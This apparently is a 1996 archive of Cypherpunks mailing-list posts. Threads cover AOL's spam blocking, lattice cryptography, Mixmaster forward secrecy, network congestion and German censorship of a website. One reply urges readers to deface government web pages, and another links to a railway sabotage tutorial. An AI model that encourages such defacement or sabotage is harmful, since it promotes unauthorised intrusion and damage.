Message-ID: <32319F8B.53C3@dorsai.org>

Damaged Justice wrote:
>
> This is utter horseshit.
AOL, like any private individual or organization,
> has the right to refuse service to anyone at any time for any reason, or
> even for no reason at all.

That seems to undermine the analogy that the Internet is like an immense electronic postal service, which suggests a more public than private enterprise.

I take issue with the assumption that a carrier of the "internet postal service" has the status of a "private individual or organization." I think that a corporation providing a mail delivery service might not be as free as a private individual is to set arbitrary limits on the services they provide to their customers. Unlike the people who donate their time and resources to the Internet out of goodwill, and who may set arbitrary limits on the services they provide, in my experience, out of bad will, and who cannot be so easily removed, a corporation's business can suffer if it doesn't provide services. One of the good things about the commercialization of the Internet is that you can fire those who, instead of providing a service, are busy exercising arbitrary rights to refuse services unfairly or for no reason whatsoever.

If the Internet is supposed to be some sort of postal service, and the ISP's are supposed to be akin to carriers, who don't regulate content, then I think it's wrong for them to regulate the content of the mail service that they provide, even in the case of junkmail. (Of course ISP's may impose various network controls that may have the effect of restricting mass mailings without discriminating against content per se. However, it is naive to assume that many network controls will not have some effect on content, simply because of a logical distinction between network control and editorial control - how many times have you heard various thinkers complain that the TV network soundbite isn't enough to sustain critical commentary, etc?)

>The gubmint isn't doing SQUAT, except forcing
> AOL to allow the spammers access.
Since I reject the flat assumption that corporate ISP's have the same freedom as private individuals to set limits on the internet services they provide - in this case their freedom to act is limited by business constraints - it's fair to ask why it's morally OK for ISP's to censor junkmail, but if the government wants to step in, that's another matter entirely. I'm not in favor of the government stepping in, but I am in favor of some consequences of the commercialization of the internet. A bad consequence is the increased volume of junkmail. A good consequence is the possibility of removing people who act as arbirary censors of other people's mail or speech, who invoke their rights as private individuals to regulate the services they provide for any reason whatsoever, while they hold their government to a higher standard of conduct, and even seek the protection of their government to act like petty dictators. > > -- > http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information > Hey, Bill Clinton: You suck, and those boys died! I hope you die! > I feel a groove comin' on $ Freedom...yeah, right. > F Lengyel flengyel at dorsai.org http://www.dorsai.org/~flengyel From wb8foz at nrk.com Sat Sep 7 08:49:51 1996 From: wb8foz at nrk.com (David Lesher) Date: Sat, 7 Sep 1996 23:49:51 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960907112946.00afa290@panix.com> Message-ID: <199609071340.JAA03365@nrk.com> Duncan Frissell sez: > > >Try and pay cash in most Fedex offices. > > Buy money order. Slip it into the plastic pouch with the airbill. Drop it > into collection box. Works. But then the cameras at the Post Office will get you... 
-- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From frissell at panix.com Sat Sep 7 09:00:58 1996 From: frissell at panix.com (Duncan Frissell) Date: Sun, 8 Sep 1996 00:00:58 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960907112946.00afa290@panix.com> At 10:20 PM 9/6/96 -0400, David Lesher / hated by RBOC's in 5 states wrote: >> >> So switch to Fedex. The P.O. gives lousy service anyway. Privitize. >> > >Try & mail an anonymous FedEx package. >Try and pay cash in most Fedex offices. Buy money order. Slip it into the plastic pouch with the airbill. Drop it into collection box. Works. DCF From frogfarm at yakko.cs.wmich.edu Sat Sep 7 09:00:58 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sun, 8 Sep 1996 00:00:58 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: Message-ID: <199609071337.JAA20307@yakko.cs.wmich.edu> > > This is utter horseshit. AOL, like any private individual or organization, > > has the right to refuse service to anyone at any time for any reason, or > > even for no reason at all. The gubmint isn't doing SQUAT, except forcing > > AOL to allow the spammers access. > > AOL has a service agreement with their customers, and they are not allowed > to change the rules just because they feel like it (I believe that this > is called a contract :) This is the jist of the injunction. I've never looked at the AOL terms of service. I imagine they are rewriting them even as we speak. If enough people get pissed that the contract was changed, they'll leave. I'm sure most folks won't give a damn. It may set a bad precedent, but somehow I doubt AOL is going to start changing their contract whenever it suits them simply to piss off customers. 
What they're doing now, they're doing in order to remain on good terms with the rest of the net. "Spamming" is often a subjective term: Like "porn", we know it when we see it. Which makes it crucial that people make up their own minds about it, without gubmint interference. Some ISP's will tolerate spammers, others won't. The ones that do will face an uphill battle, and possible eventual Usenet Death Penalty if the spam is thick enough. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information why the dancing shouting why the shrieks of pain the lovely music why the smell of burning autumn leaves working on the tiny blueprint of the angle I must be silent must contain my secret smile you my mirror you my iron bars From jya at pipeline.com Sat Sep 7 09:12:59 1996 From: jya at pipeline.com (John Young) Date: Sun, 8 Sep 1996 00:12:59 +0800 Subject: Lattice Crypto Message-ID: <199609071338.NAA06648@pipe3.t1.usa.pipeline.com> The Economist, September 7, 1996, p. 79. Cryptography: Puzzling secrets The truly paranoid have but one friend: mathematics. Nothing (and nobody) else can be as trusted to keep a secret. To transmit your credit card number, for example, through an Internet full of thieves, the best way is to hide it in a mathematical problem so excruciatingly difficult that no thief could ever crack it, even by hijacking all the world's computers for the effort. Devising such problems is the business of cryptographers. To be useful, the problems must be easy to create as well as impossible to unravel. Multiplying numbers is very easy. Taking the result and working out what numbers were multiplied together to produce it (known as factorisation) is a lot more difficult. It is not obvious that 4,294,967,297 is the product of 641 and 6,700,417. The two smaller numbers in this calculation are prime: that is, neither can be factorised into two further smaller numbers. 
The coding systems generally used by governments, businesses and software companies such as Netscape (known as RSA encoding schemes, after Ronald Rivest, Adi Shamir, and Leonard Adleman, who invented the idea in 1977), mix a number even huger than 4,294,967,297 into a message, and then churn it in such a way that only the number's prime factors can undo the mess. The big number is used to make a "public key" (each user has his own, but it is available to those who might wish to communicate with him). The two prime factors compose a private key, guarded carefully by their owner. The trouble is that nobody is absolutely sure how safe this scheme is. At present a public key that was 400 digits long would take existing computers longer than the age of the universe to crack. But it remains to be proved in a rigorous mathematical way that no systematic short-cut exists. Indeed, some types of numbers are easy to factorise, and RSA schemes must avoid these known softies. It may yet turn out that, even if factorising is hard in general (as mathematicians suspect, after centuries of trying), there is a sneaky way, in the case of some other types of numbers, to do it quickly. This would be bad luck if you chose such a number. Private users may not care much: it is unlikely that someone who discovered such a loophole would use it for anything so modest as unscrambling credit card numbers. But governments, whose secrets are worth a lot more, are always on the lookout for better cloaks to go with their daggers. The ultimate cryptographic feat would therefore be a mathematical proof that all choices of a particular problem useful in code-making are forever intractable. Nobody is that clever yet. But Miklos Ajtai, a mathematician at the IBM Almaden Research Centre in San Jose, California, has made progress with puzzles called "lattice reductions". 
If you pick any such problem using his guidelines, it is -- unlike a factorisation problem -- guaranteed to be just as thorny as the most difficult one imaginable. Since many mathematicians also suspect that the toughest lattice-reduction problem is almost impossible to crack, Dr Ajtai's proof, completed in May, increases the confidence that they would all make good wrappings for secret messages. For mathematical aesthetes, lattice problems have more panache than the dull numerals of factorisation. Instead of factorising, say, a 200-digit number, a lattice reduction invites the would-be codebreaker to deduce the most basic way a pattern repeats itself in a piece of 200-dimensional decorative wallpaper. This is every bit as hard as it sounds. To describe a repeating pattern of rows and columns of flowers on an ordinary piece of wallpaper, two "arrows" suffice. Each points from one flower to a nearby one. If you start with a wall which is blank, except for one flower, you can reconstruct the entire design with the arrows: lay the ends of the arrows on the flower and draw new flowers (with new arrows) at each arrowtip. Repeat the process with the new flowers and the wall will eventually be full. Although the obvious pair of arrows to choose in this case would be at right angles to each other (eg, pointing north and east) other pairs would also work: for example north-east and east. But in this case the "north-east" arrow would have to be longer to reach the centre of the next flower than the "east" one. The puzzle is to find the shortest set of arrows that can be used to replicate the pattern -- easy in two or three dimensions, but achingly complex in the higher-dimensional spaces that the imaginations of mathematicians inhabit. By the time the pattern has 200 dimensions, today's fastest computers would be unable to find the 200 smallest arrows describing an arbitrary pattern before the sun ran out of fuel. 
Yet, as with two prime numbers, it is easy to begin with those arrows and produce the design. But how do you hide a secret message, accessible only with a private key, in a publicly available lattice? Shafi Goldwasser, Oded Goldreich and Shai Halevi, of the Massachusetts Institute of Technology and the Weizmann Institute, in Israel, have just proposed a way. In order to encode a line of digits, they first interpret them as coordinates for a point in the lattice. Then they mix up the numbers by nudging that point a tiny random amount into the empty space between lattice points. To retrieve the original number, an eavesdropper would need to find the way back to the nearest lattice point, which is almost -- but not quite equivalent to knowing its shortest arrows. The trouble with it being not quite equivalent is that the encoding scheme changes the problem slightly -- enough for it to fall just outside the range of Dr Ajtai's proof that any instance of his lattice scheme is as hard to solve as the most difficult one. There is hope that the proof can be extended to include the encryption scheme, or that the scheme can be modified to fit the proof. But a proof that nobody could ever invent a quick method to solve the toughest lattice reduction would be nicer still -- except that its inventor would put fellow code-breakers out of work. A cryptographer who invented such a system might well be tempted to keep it secret. [Graphic of wallpaper omitted] [End] From bdolan at use.usit.net Sat Sep 7 09:20:11 1996 From: bdolan at use.usit.net (Brad Dolan) Date: Sun, 8 Sep 1996 00:20:11 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <199609070433.VAA26061@adnetsol.adnetsol.com> Message-ID: Anybody else have the cynical thought that the gubmint is trying to *encourage* us to beg for regulation? bd On Fri, 6 Sep 1996, Ross Wright wrote: > On Or About: 6 Sep 96 at 23:16, Damaged Justice wrote: > > > > > This is utter horseshit. 
AOL, like any private individual or organization, > > has the right to refuse service to anyone at any time for any reason, or > > even for no reason at all. > > Sure. I agree with that, no shoes no shirt, if you are on AOL you > accept "internet-lite". > > > The gubmint isn't doing SQUAT, except forcing > > AOL to allow the spammers access. > > Right now. Yet it has been apparent to me that many people are > begging for restrictions to be put in place. Restrictions on > spammers. The government saying anything about regulation of the > internet is bad... Yet people still scream about a couple of > unwanted e-mails. I'm saying that this spammer thing could be the > "kink in our armour" that lets the government into our little > playground here. Just suck it up and delete those messages. > > Jog it off. > > Ross > > =========== > Ross Wright > King Media: Bulk Sales of Software Media and Duplication Services > http://www.slip.net/~cdr/kingmedia > Voice: 415-206-9906 > From frogfarm at yakko.cs.wmich.edu Sat Sep 7 09:23:09 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sun, 8 Sep 1996 00:23:09 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <32319F8B.53C3@dorsai.org> Message-ID: <199609071350.JAA20470@yakko.cs.wmich.edu> > > This is utter horseshit. AOL, like any private individual or organization, > > has the right to refuse service to anyone at any time for any reason, or > > even for no reason at all. > > That seems to undermine the analogy that the Internet is like an immense > electronic postal service, which suggests a more public than private > enterprise. Perhaps that analogy held when the Internet was supported with money taken at gunpoint from all us tax serfs. No more - you wanna play, you gotta pay. Which is as it should be. 
[snip] >Unlike the people who donate their time and > resources to the Internet out of goodwill, and who may set arbitrary > limits on the services > they provide, in my experience, out of bad will, and who cannot be so > easily > removed, a corporation's business can suffer if it doesn't provide > services. If their business suffers because of a decision, they may reconsider that decision. If they don't, they'll either survive, or they won't, depending on if their customers will stand for it. I fail to see why charging money for the services one provides suddenly transforms a person into a slave, forced to provide service even if they do not wish to do so. Do you feel that providing a service for free is more "noble", somehow, and therefore more "worthy" of protection? > One of the good things about the commercialization of the Internet is > that > you can fire those who, instead of providing a service, are busy > exercising arbitrary rights to refuse services unfairly or for no reason > whatsoever. Who is going to "fire" a company that provides a service? The gubmint is your only alternative; the gun of the law, your only tool. If you don't like your ISP, get a different one. Spammers do it all the time. People are whining all over the place about "exercising arbitrary rights", as if it were eeeeevil when companies do it. Get a grip. It's called DISCRIMINATION, and it's not a bad word; it's just been corrupted beyond belief by the PC mindset. When I discriminate, I am exercising my taste, my judgment, in deciding who I wish to associate with; who I wish to give my money to in exchange for services; who I trust, and who I do not. If a company kicks a spammer off their system, what recourse do you want them to have, other than their right to "vote with their feet" and find a different provider? It seems you would find it favorable for them to go whining to the gubmint: "Waaah! He kicked us out of his treehouse! You go beat 'em up and make 'em take us back!" 
If they can seize John Adams' yacht, they can seize your beat-up old car. If they can force XYZ Corp to provide access, they can force anyone to do anything, and there is no grounds for complaint. After all, universal access must be provided! A chicken in every pot, and a router in every garage! Right? > >The gubmint isn't doing SQUAT, except forcing > > AOL to allow the spammers access. > > Since I reject the flat assumption that corporate ISP's have the same > freedom as private individuals to set limits on the internet services > they provide - in this case their freedom to act is limited by business > constraints - it's fair to ask why it's morally OK for ISP's to censor > junkmail, but if the government wants to step in, that's another > matter entirely. Because only the gummint can "censor". Whatever anyone else does is NOT censorship, unless you want to redefine words to suit your pleasure. It is exercising judgment and taste. Whether you find that judgment acceptable or not is not an excuse to impose your judgment on others at gunpoint. > I'm not in favor of the government stepping in, but I am in favor of > some consequences of the commercialization of the internet. A bad > consequence is the increased volume of junkmail. A good consequence > is the possibility of removing people who act as arbirary censors > of other people's mail or speech, who invoke their rights as private > individuals to regulate the services they provide for any reason > whatsoever, while they hold their government to a higher standard > of conduct, and even seek the protection of their government to > act like petty dictators. Pot. Kettle. Black. 
--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
why the dancing shouting why the shrieks of pain the lovely music why the
smell of burning autumn leaves working on the tiny blueprint of the angle
I must be silent must contain my secret smile you my mirror you my iron bars

From wb8foz at nrk.com Sat Sep 7 09:27:18 1996
From: wb8foz at nrk.com (David Lesher)
Date: Sun, 8 Sep 1996 00:27:18 +0800
Subject: Junk Phone Calls, Metered Usage, and Cellphones
In-Reply-To:
Message-ID: <199609071330.JAA03308@nrk.com>

Timothy C. May sez:
>
> The downside is that calls _from_ or _to_ my phone during "business" hours
> are charged 42 cents a minute, airtime (tying up a channel and all), plus
> whatever other fees may be applicable at each end. Thus, every "junk call"
> I get trying to get me to buy aluminum siding, or to vote Democratic, or to
> switch my long-distance carrier (!), costs me a minimum of 42 cents,

The GSMish PCS carrier is winning points here with:

No contacts to sign.
1st minute of all incoming calls is free.

--
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

From aba at dcs.ex.ac.uk Sat Sep 7 09:50:51 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 8 Sep 1996 00:50:51 +0800
Subject: forward secrecy in mixmaster
Message-ID: <199609061703.SAA00170@server.test.net>

Since Peter Allen's discussion of mixmaster, I started doing something I'd been thinking of for a while, since noticing that it was on the mixmaster to-do list months ago (ie there is unfinished source to do this): direct socket connections and diffie-hellman key exchange for forward secrecy.

I wrote the socket stuff yesterday evening, didn't take too long as socket programming is something I've done lots of.
Now comes what do you actually send down the sockets.

Question for Lance, and any others who were involved in mixmaster's implementation: what did you have in mind as a way of negotiating the DH keys?

I notice that mixmaster generates a DH key and stores it in file `DH.mix', but that this is not (as far as I can see from the source) included in the remailer's public key block.

(A couple of comments as an aside: I think that you should be able to have a much smaller generator without loss of security, this should reduce the overhead of a DH key exchange. Using 3 even I think is safe, without any extra precautions on prime generation. You can even go to 2, with a few precautions (PGPfone does this). Comment #2 I think 1024 may be a bit small, I don't have any figures handy for relative security of DH key lengths, but PGPfone offers 4096 bit DH for instance. Does rsaref have limits on prime lengths for DH, the same as it does for RSA?).

There are lots of options for DH public key negotiation.

First option is whether you have a common prime and generator for all remailers or not.

If you have a common prime, accusations of the prime being `cooked' (chosen to have a weakness) can be mitigated by using a deterministic generation method based on the hash of a known phrase (a Jefferson quote perhaps), or PI or whatever.

A common modulus may offer a fatter target for attack (for some precomputation attacks), but with large enough keys this probably isn't that bad, as there aren't that many mixmasters anyway.

With a common modulus there is DH key negotiation needed, just include it with the source.
For different moduli for each remailer, there are more options:

a) include the DH key signed by the RSA key in the remailer's public key (may break backwards compatibility with existing versions of mixmaster)

b) send the DH public key at the start of each session

c) send the DH public key on request

There is also a question of which key do you use, the sender remailer's or the recipient remailer's.

Negotiating DH public keys during execution also opens the possibility for periodic re-keying.

That's the end of my thoughts on direct socket mixmaster. Next message is some thoughts on non-interactive forward secrecy protocols.

Adam
--
#!/bin/perl -sp0777i
Message-ID: <32317F59.7E32@elcafe.com>

Ulf Moeller wrote:

> Uh? Their sabotage "tutorial" is very careful about not causing
> danger to humans. Where did you see any "explosive-warning" signs?

Correct. On the one hand, they promote not to cause any harm to people. On the other hand, check out the following:

Inflammable sets: http://www.serve.com/spg/154/96.html
Explosive warnings: http://www.serve.com/spg/154/92.html

> As long as there is no English translation available, please be exact
> when posting excerpts.

I've tried to be as close as possible.

> Publishing texts doesn't destroy any railway signals. Some people
> do; and IMHO everyone must have the right to inform themselves
> how stupid those people are.

Agreed.

Cheers
Moe!

From aba at dcs.ex.ac.uk Sat Sep 7 09:54:05 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 8 Sep 1996 00:54:05 +0800
Subject: non-interactive forward secrecy
Message-ID: <199609062108.WAA00230@server.test.net>

[This discussion is driven by the desirability of having forward secrecy in mixmaster for the mix packets delivered by email where the interactive nature of normal DH is inconvenient]

Anyone have any ideas for a non-interactive forward secrecy protocol?
Aside from actually doing the DH key exchange via email (painful), I have one suggestion for a protocol, perhaps people can improve on this:

Assuming common prime p, and generator g:

Two remailers A and B. A wants to send messages to B without having to wait for replies from B.

B generates ys (y0,y1,...,yn), where

    y(i+1) = hash(y(i))

then computes Ys (Y0,Y1,...,Yn) where

    Y(i) = g ^ y(i) mod p

B sends A Ys, and discards ys.

Now A can send B n consecutive packets with forward secrecy before receiving any more packets from B.

(B keeps y0, and overwrites it with y1 = hash(y0), etc, so that all B ever has to hand is the current y(i), and y(i-1) is hard to compute from y(i) because of the hash function's properties.)

This isn't truly non-interactive, it just reduces the number of interactions, to an interactive exchange in 1 out of n cases.

(you could randomly choose ys rather than having related ys, and delete y(i) after use, but this has higher storage requirements (n rather than 1 on the recipient)).

Here's the obvious construction for a truly non-interactive forward secrecy protocol based on DH. (That is it only requires 1 interactive exchange).

Aside from the obvious of having a huge n, and the above protocol, which would have large space requirements, what we're after is a way to do this with negligible space requirements.

Say that we have the two parties Alice and Bob. Bob doesn't lose much by having his secret (x) related as above.

    1. x(i+1) = f1( x(i) )
    2. X(i+1) = f2( X(i) )
    3. f1 is non reversible

f1 should have hash-like properties (it should be non-reversible).

Do functions f1 and f2 satisfying 1, 2 and 3 exist?

Is there another way to achieve this?
(My closest attempt so far, based on the hardness of discrete square roots:

    f1(x) = x^2 (mod p)
    f2(X) = X^2 (mod p)

doesn't work because

    g^(x^2 mod p) mod p != g^(x^2) mod p)

Adam
--
#!/bin/perl -sp0777i
Message-ID: <199609071517.LAA19170@jekyll.piermont.com>

Jim McCoy writes:
> perry at piermont.com writes:
> > Alan Olsen writes:
> > > Metcalfe may have a valid prediction here.
> >
> > Metcalfe is talking out his ass. He's reached the "old geezer who's
> > impeding his own field" stage. Many of his articles seem to be written
> > as though no one was trying to fix problems.
>
> Well, having talked with people involved with the problems I can assure you
> that they are real.

I'm "involved with the problems" too, you know. Don't teach granpaw to suck eggs.

OF COURSE there are problems. None of them, however, are signs of "collapse". As a certified Network Old Fogie, I can tell you about the time the Arpanet decided to die because of a bug in the IMPs... and then there was the day that the backhoe took out *the* line between the east and west coasts... and then there was the time in the 80s before Van J's algorithm where congestion was nuking everything in sight... and then there was...

Look, there will *always* be trouble. The question is whether or not "collapse" is something imminent. The answer is "no". Stuff will get better, it will get worse, but the overall trend is better, and collapse just isn't in the cards.

Metcalfe talks about stupidity like how there aren't enough "suits" running the net -- as though people in suits do better engineering than the folks we've got. Metcalfe talks as though no one is trying to fix the trouble. There already *are* people working hard trying to fix the trouble, and they know a lot more than he does.

> > > When I run traceroutes, the blockage is in MCI or Sprintnet land.
> >
> > How do you manage to determine where you are losing bandwidth using
> > traceroute?
> > That must be a mighty powerful traceroute to do that --
> > most traceroutes I've seen are hard pressed just to find out what the
> > connectivity path is.
>
> Then you should probably upgrade your traceroute, preferably to one which
> allows source routing of the packets and then couple the output to a nice
> udp source routing script which will bounce a few packets between links
> with slow response times.

That doesn't tell you squat about bandwidth. At best, you can find a really bad link that way, but there is no way to quantify the problem, and no way to detect things like how much traffic is hitting that link.

The only way -- the ONLY way -- to determine link utilization from the outside is with a management protocol like SNMP.

Perry

From flengyel at dorsai.org Sat Sep 7 10:44:06 1996
From: flengyel at dorsai.org (Florian Lengyel)
Date: Sun, 8 Sep 1996 01:44:06 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609071350.JAA20470@yakko.cs.wmich.edu>
Message-ID: <3231BF59.773C@dorsai.org>

Damaged Justice wrote:
>
> > > This is utter horseshit. AOL, like any private individual or organization,
> > > has the right to refuse service to anyone at any time for any reason, or
> > > even for no reason at all.
> >
> > That seems to undermine the analogy that the Internet is like an immense
> > electronic postal service, which suggests a more public than private
> > enterprise.
>
> Perhaps that analogy held when the Internet was supported with money taken
> at gunpoint from all us tax serfs. No more - you wanna play, you gotta pay.
> Which is as it should be.
>
> [snip]
>
> >Unlike the people who donate their time and
> > resources to the Internet out of goodwill, and who may set arbitrary
> > limits on the services
> > they provide, in my experience, out of bad will, and who cannot be so
> > easily
> > removed, a corporation's business can suffer if it doesn't provide
> > services.
>
> If their business suffers because of a decision, they may reconsider that
> decision. If they don't, they'll either survive, or they won't, depending
> on if their customers will stand for it.

My point exactly

> I fail to see why charging money
> for the services one provides suddenly transforms a person into a slave,
> forced to provide service even if they do not wish to do so.

Non sequitur.

> Do you feel
> that providing a service for free is more "noble", somehow, and therefore
> more "worthy" of protection?

Non sequitur.

>
> > One of the good things about the commercialization of the Internet is
> > that
> > you can fire those who, instead of providing a service, are busy
> > exercising arbitrary rights to refuse services unfairly or for no reason
> > whatsoever.
>
> Who is going to "fire" a company that provides a service? The gubmint is
> your only alternative; the gun of the law, your only tool.

You provide the answer that I had in mind:

>
> If you don't like your ISP, get a different one. Spammers do it all the
> time.

> People are whining all over the place about "exercising arbitrary
> rights", as if it were eeeeevil when companies do it. Get a grip.

Non sequitur. You're not responding to my point, which is a moral criticism of the tone of statements like

> > > any private individual or organization,
> > > has the right to refuse service to anyone at any time for any reason, or
> > > even for no reason at all.

which seem to oversimplify matters for corporations like AOL. Of course AOL can repeat statements like these to its customers until it was blue in the face, but the good news is that their customers could vote with their feet. My criticism of your statement is that it is an aesthetically ugly and hypocritical position to take, if one purports to provide mail services to hundreds of thousands of customers, or purports not to engage in editorial control, or purports to promote free speech.
If ISP's want to provide services subject to arbitrary limitations fine ... I am stating that I find this practice deplorable, and I have not implied that I favor government regulation to correct such situations, as much as you want to believe that I have.

> If a company kicks a spammer off their system, what recourse do you
> want them to have, other than their right to "vote with their feet" and
> find a different provider?

None.

> It seems you would find it favorable for them
> to go whining to the gubmint: "Waaah! He kicked us out of his treehouse!
> You go beat 'em up and make 'em take us back!"

That's an overinterpretation of my words.

> If they can seize John Adams' yacht, they can seize your beat-up old car.
> If they can force XYZ Corp to provide access, they can force anyone to
> do anything, and there is no grounds for complaint. After all, universal
> access must be provided! A chicken in every pot, and a router in every
> garage! Right?

Non sequitur.

>
> > >The gubmint isn't doing SQUAT, except forcing
> > > AOL to allow the spammers access.
> >
> > Since I reject the flat assumption that corporate ISP's have the same
> > freedom as private individuals to set limits on the internet services
> > they provide - in this case their freedom to act is limited by business
> > constraints - it's fair to ask why it's morally OK for ISP's to censor
> > junkmail, but if the government wants to step in, that's another
> > matter entirely.
>
> Because only the gummint can "censor". Whatever anyone else does is NOT
> censorship, unless you want to redefine words to suit your pleasure. It
> is exercising judgment and taste. Whether you find that judgment acceptable
> or not is not an excuse to impose your judgment on others at gunpoint.

What dictionary do you use?

> > I'm not in favor of the government stepping in, but I am in favor of
> > some consequences of the commercialization of the internet. A bad
> > consequence is the increased volume of junkmail.
A good consequence > > is the possibility of removing people who act as arbirary censors > > of other people's mail or speech, who invoke their rights as private > > individuals to regulate the services they provide for any reason > > whatsoever, while they hold their government to a higher standard > > of conduct, and even seek the protection of their government to > > act like petty dictators. > > Pot. Kettle. Black. I see you've looked in the mirror recently :) > > -- > http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information > why the dancing shouting why the shrieks of pain the lovely music why the > smell of burning autumn leaves working on the tiny blueprint of the angle > I must be silent must contain my secret smile you my mirror you my iron bars F Lengyel flengyel at dorsai.org http://www.dorsai.org/~flengyel From jya at pipeline.com Sat Sep 7 10:45:27 1996 From: jya at pipeline.com (John Young) Date: Sun, 8 Sep 1996 01:45:27 +0800 Subject: ASP_oil Message-ID: <199609071500.PAA11688@pipe3.t1.usa.pipeline.com> 9-7-96. FiTi: "Indian herb trick turns water into kerosene." A young, unemployed south Indian has flummoxed India's top government scientists by demonstrating an apparently simple recipe for producing a kerosene-like fuel by boiling a "mystery" herb in water: prospectively, he hopes, revolutionising the world energy industry. "We have no doubt we are sitting on something very big," said Mr Valangiman Ramamurthi, India's top science bureaucrat. Watching scientists professed little idea how or why the process worked, but said it conclusively produced "a clear oil separation in substantial quantities" which tests have identified as a hydrocarbon similar to kerosene. "Its properties make it better than petrol," said one. "Apparently the herb can grow widely in all types of soil -- it is very exciting." 9-7-96. WaPo: "More in the Pipeline." In the 1970s fear gripped the Western world that Earth was running out of oil. 
Since then, vast new reserves have been discovered that can be extracted with current technology. The known crude oil reserve now amounts to one trillion barrels -- enough for 45 to 50 years at current world production rates, and estimated reserves are at least one trillion barrels more. ----- http://jya.com/aspoil.txt (6 kb for 2) ASP_oil From rah at shipwright.com Sat Sep 7 10:46:16 1996 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 8 Sep 1996 01:46:16 +0800 Subject: Metcalf and Other Net.Fogies In-Reply-To: Message-ID: I think it was one of Clarke's numerous laws: "If an old scientist says it can't be done and a young scientist says it can, believe the young scientist." I think the contrapositive also holds... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From jya at pipeline.com Sat Sep 7 11:31:19 1996 From: jya at pipeline.com (John Young) Date: Sun, 8 Sep 1996 02:31:19 +0800 Subject: USF_avv MS's Martha Stewart Message-ID: <199609071543.PAA11548@pipe6.t2.usa.pipeline.com> For MSerfs and groupies: A NYC local rag has a salacious article, "Microsoft's own Martha Stewart," on Michael Goff, the newly appointed editor of Cityscape, MS's upcoming urban-slurp-fuck-and-vomit vanity. Excerpts: The key to why Bill Gates hired Mr. Goff may lie in the fact that Mr. Goff is a marketing maniac, a self-confessed "media whore." "He became more of an egotistical asshole overnight than anyone I'd ever seen when the magazine [Out] came out," said one prominent gay journalist and acquaintance. Mr. Goff is indeed a family man, of sorts: He confirmed that he is considering donating his services to two lesbian friends who want to raise their own child. He bristled at being pigeonholed for being gay, rather than being recognized for his creativity. 
"It has nothing to do with me being gay or not," he said. "I've always been focused on doing mass consumer media." Besides, he added, "They're not paying me like that. I don't have a jet or anything." ----- http://jya.com/usfavv.txt USF_avv From pstira at escape.com Sat Sep 7 11:32:24 1996 From: pstira at escape.com (pstira at escape.com) Date: Sun, 8 Sep 1996 02:32:24 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: <32316455.794BDF32@systemics.com> Message-ID: Gosh, I'm not a German citizen, and don't even have a nickel's worth of german blood in my body, but who will be the first to add some real pretty pixtures and some snazzy ol' text adages to THEIR governments' web pages? Life needs more risk. If we ever EVER hope to establish any sort of DISestablishment, it only starts with us. Well, you. As I said, I'm not German (and quid pro quo, and stuff like that). ;) Millie sfuze at tiac.net PS: Why not mirror it on their own sites? ;) On Sat, 7 Sep 1996, Gary Howland wrote: > Timothy C. May wrote: > > > * as Germany is bent on blocking sites which carry this subversive > > pamphlet, "Radikal," let us mirror it on thousands of sites around the > > world. > > Agreed - put them in a dilemna by getting mirrors on machines obviously > important and useful to the Germans. > > > * when the Germans went into Danmark and insisted Jews wear badges, > > ordinary citizens (and the Danish Royal Family, as I recall) also took to > > wearing these Star of David badges. > > Bad example. Jews living in Denmark were not required to wear yellow > stars. The story about the Danish royal family wearing the stars is an > urban legend, spread by the British to make the Danish King appear to be > less of a coward after he fled to England. > > Gary > -- > "Of course the US Constitution isn't perfect; but it's a lot better > than what we have now." -- Unknown. 
> > pub 1024/C001D00D 1996/01/22 Gary Howland > Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 > > From roger at coelacanth.com Sat Sep 7 11:37:40 1996 From: roger at coelacanth.com (Roger Williams) Date: Sun, 8 Sep 1996 02:37:40 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609071340.JAA03365@nrk.com> Message-ID: >>>>> David Lesher writes: > Duncan Frissell sez: >> >Try and pay cash in most Fedex offices. >> >> Buy money order. Slip it into the plastic pouch with the >> airbill. Drop it into collection box. Works. For that matter, I've never had a problem using exact change in the airbill pouch, either. > But then the cameras at the Post Office will get you... Aha, I see your problem, David -- you've been trying to mail FedEx parcels from the Post Office (that trick *never* works). Seriously, I haven't seen many cameras aimed at street-corner FedEx drop boxes. -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From dlv at bwalk.dm.com Sat Sep 7 11:54:16 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 8 Sep 1996 02:54:16 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <960906233848_279253392@emout14.mail.aol.com> Message-ID: AwakenToMe at aol.com writes: > In a message dated 96-09-06 23:31:06 EDT, rwright at adnetsol.com (Ross Wright) > writes: > > << Everyone on this list seems to want to limit > government intervention EXCEPT when it comes to spam, then every > one just holds the door open wide and let them in. If they get that > inch, they WILL take 